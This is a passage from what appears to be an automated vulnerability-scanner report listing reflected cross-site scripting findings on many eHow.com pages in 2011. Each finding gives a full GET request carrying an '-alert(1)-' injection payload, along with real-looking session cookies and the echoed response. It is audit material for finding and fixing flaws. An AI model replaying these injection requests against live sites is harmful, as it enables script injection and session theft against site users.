GET /list_6515049_common-english-grammar-mistakes.html?10d4f'-alert(1)-'1fbf08c4b2=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:06 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73897

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Common English Grammar Mistakes | eHow.com</title
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/list_6515049_common-english-grammar-mistakes.html?10d4f'-alert(1)-'1fbf08c4b2=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/list_6515049_common-english-g
...[SNIP]...

4.396. http://www.ehow.com/list_7189463_grammar-check-tools.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/list_7189463_grammar-check-tools.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f696'-alert(1)-'36d4bf4f664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /list_7189463_grammar-check-tools.html?8f696'-alert(1)-'36d4bf4f664=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:11 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74112

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Grammar Check Tools | eHow.com</title>
<meta c
...[SNIP]...
<script language="javascript" type="text/javascript">
try { var OriginalURL = '/list_7189463_grammar-check-tools.html?8f696'-alert(1)-'36d4bf4f664=1'; }
catch (e) { OriginalURL = ''; }
try {
if ((typeof(OriginalURL) == 'undefined') || (OriginalURL == null) || (OriginalURL == '')) {
window.OriginalURL = '/list_7189463_grammar-check-to
...[SNIP]...

4.397. http://www.ehow.com/mental-health/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/mental-health/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6eff9'-alert(1)-'f101b15d2dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mental-health/?6eff9'-alert(1)-'f101b15d2dd=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:52 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70531

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Mental Health - How To Information | eHow.com</ti
...[SNIP]...
<fb:like href="http://www.ehow.com/mental-health/?6eff9'-alert(1)-'f101b15d2dd=1" ref="like" width="300">
...[SNIP]...

4.398. http://www.ehow.com/music/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/music/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c895b'-alert(1)-'64cf7ef5a86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /music/?c895b'-alert(1)-'64cf7ef5a86=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:55 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70451

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Music - How To Information | eHow.com</title>

...[SNIP]...
<fb:like href="http://www.ehow.com/music/?c895b'-alert(1)-'64cf7ef5a86=1" ref="like" width="300">
...[SNIP]...

4.399. http://www.ehow.com/parenting/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/parenting/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d92b9'-alert(1)-'0c6c4fea76f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /parenting/?d92b9'-alert(1)-'0c6c4fea76f=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:52 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71130

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Parenting - How To Information | eHow.com</title>
...[SNIP]...
<fb:like href="http://www.ehow.com/parenting/?d92b9'-alert(1)-'0c6c4fea76f=1" ref="like" width="300">
...[SNIP]...

4.400. http://www.ehow.com/personal-finance/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/personal-finance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af06a'-alert(1)-'0adecf09358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /personal-finance/?af06a'-alert(1)-'0adecf09358=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:55 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72649

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Personal Finance - How To Information | eHow.com<
...[SNIP]...
<fb:like href="http://www.ehow.com/personal-finance/?af06a'-alert(1)-'0adecf09358=1" ref="like" width="300">
...[SNIP]...

4.401. http://www.ehow.com/pets-and-animals/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/pets-and-animals/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b3ff'-alert(1)-'99115dd9ab8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pets-and-animals/?4b3ff'-alert(1)-'99115dd9ab8=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:56 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73362

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Pets & Animals - How To Information | eHow.com</t
...[SNIP]...
<fb:like href="http://www.ehow.com/pets-and-animals/?4b3ff'-alert(1)-'99115dd9ab8=1" ref="like" width="300">
...[SNIP]...

4.402. http://www.ehow.com/plant-care/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/plant-care/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca0be'-alert(1)-'24a20a51608 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /plant-care/?ca0be'-alert(1)-'24a20a51608=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:56 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70342

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Plant Care - How To Information | eHow.com</title
...[SNIP]...
<fb:like href="http://www.ehow.com/plant-care/?ca0be'-alert(1)-'24a20a51608=1" ref="like" width="300">
...[SNIP]...

4.403. http://www.ehow.com/plants/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/plants/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6081b'-alert(1)-'569f4a88c46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /plants/?6081b'-alert(1)-'569f4a88c46=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:12 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70810

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Plants - How To Information | eHow.com</title>

...[SNIP]...
<fb:like href="http://www.ehow.com/plants/?6081b'-alert(1)-'569f4a88c46=1" ref="like" width="300">
...[SNIP]...

4.404. http://www.ehow.com/real-estate-and-investment/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/real-estate-and-investment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53aa7'-alert(1)-'f84def696ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /real-estate-and-investment/?53aa7'-alert(1)-'f84def696ff=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71097

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Real Estate & Investment - How To Information | e
...[SNIP]...
<fb:like href="http://www.ehow.com/real-estate-and-investment/?53aa7'-alert(1)-'f84def696ff=1" ref="like" width="300">
...[SNIP]...

4.405. http://www.ehow.com/recipes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/recipes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e535'-alert(1)-'5ff63e72f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /recipes/?9e535'-alert(1)-'5ff63e72f1=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72823

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Recipes - How To Information | eHow.com</title>

...[SNIP]...
<fb:like href="http://www.ehow.com/recipes/?9e535'-alert(1)-'5ff63e72f1=1" ref="like" width="300">
...[SNIP]...

4.406. http://www.ehow.com/recreational-activities/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/recreational-activities/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6547a'-alert(1)-'db6d13f88f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /recreational-activities/?6547a'-alert(1)-'db6d13f88f8=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.407. http://www.ehow.com/relationships-and-family/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/relationships-and-family/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 444c6'-alert(1)-'5534980880c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /relationships-and-family/?444c6'-alert(1)-'5534980880c=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

4.408. http://www.ehow.com/sports/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/sports/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ad51'-alert(1)-'d33a740e072 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports/?1ad51'-alert(1)-'d33a740e072=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:15 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71169

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>Sports - How To Information | eHow.com</title>

...[SNIP]...
<fb:like href="http://www.ehow.com/sports/?1ad51'-alert(1)-'d33a740e072=1" ref="like" width="300">
...[SNIP]...

4.409. http://www.ehow.com/topic_227_take-pictures.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_227_take-pictures.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 590af'-alert(1)-'b3eeb86d5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_227_take-pictures.html?590af'-alert(1)-'b3eeb86d5e9=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:41 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=227; expires=Thu, 02-Feb-2012 15:16:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37736

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Take Photos - Basics of Photography | eHow.com
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_227_take-pictures.html?590af'-alert(1)-'b3eeb86d5e9=1" ref="like" width="300">
...[SNIP]...

4.410. http://www.ehow.com/topic_2488_lose-weight.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_2488_lose-weight.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c273d'-alert(1)-'baed76bbb17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_2488_lose-weight.html?c273d'-alert(1)-'baed76bbb17=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:49 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=2488; expires=Thu, 02-Feb-2012 15:16:49 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43044

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Lose Weight | eHow.com
</title>
<meta chars
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_2488_lose-weight.html?c273d'-alert(1)-'baed76bbb17=1" ref="like" width="300">
...[SNIP]...

4.411. http://www.ehow.com/topic_253_lose-weight-now.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_253_lose-weight-now.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 645b7'-alert(1)-'6bc677f85f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_253_lose-weight-now.html?645b7'-alert(1)-'6bc677f85f8=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:52 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=253; expires=Thu, 02-Feb-2012 15:16:52 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52844

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
Lose Weight Now - Weight Loss Diets | eHow.com
...[SNIP]...
<fb:like href="http://www.ehow.com/topic_253_lose-weight-now.html?645b7'-alert(1)-'6bc677f85f8=1" ref="like" width="300">
...[SNIP]...

4.412. http://www.ehow.com/topic_3493_lose-weight-dieting.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_3493_lose-weight-dieting.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93580'-alert(1)-'755710e4e75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /topic_3493_lose-weight-dieting.html?93580'-alert(1)-'755710e4e75=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:48 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=3493; expires=Thu, 02-Feb-2012 15:16:48 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45266

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
<title>
